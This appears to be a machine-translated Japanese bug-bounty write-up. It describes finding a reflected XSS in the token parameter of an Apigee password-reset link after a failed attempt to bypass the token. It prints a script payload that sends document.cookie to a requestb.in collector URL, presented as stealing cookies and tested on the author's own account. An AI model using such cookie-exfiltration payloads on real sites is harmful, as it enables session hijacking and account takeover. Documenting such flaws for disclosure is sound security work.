ソース:
訳:
ある時点で、パスワード リセット アクションを確認しようとしました。電子メール アカウントで次のようなリンクを取得し。
リンク :
https://api.accounts.apigee.com/management/users/[ REDACTED ]/resetpw?token=ZW0tsHaU - REDACTED- eeTDi2YRIN1CICmFjOSSE2JvllO_ - REDACTED-
ここで、トークンをバイパスしてすべてのユーザーの有効なリンクを取得して、任意のユーザーのパスワードを更新できるようにしようと考えましたが、これも失敗し、バイパスできませんでした。
リンクを編集してトークン コードを変更しようとしたときに、私にとっては正常なことがわかりました。このエントリはここではフィルタされていないようです。
そこで、テストとして XSS ペイロードを送信してみました。
そしてここから物事が始まり
クッキーを盗みましょう
他人のアカウントをハッキングすることは違法なので、自分のアカウントでテストし。
最初にペイロードを作成し。
https://api.accounts.apigee.com/management/users/xxxxxx/resetpw?token=x xxxxxx"><script>new Image().src='https://requestb.in/xxxxxx?code=' +document.c ookie</script><a href=”
クリックすると、すべての Cookie が私たちに送信されて。
ほなほな。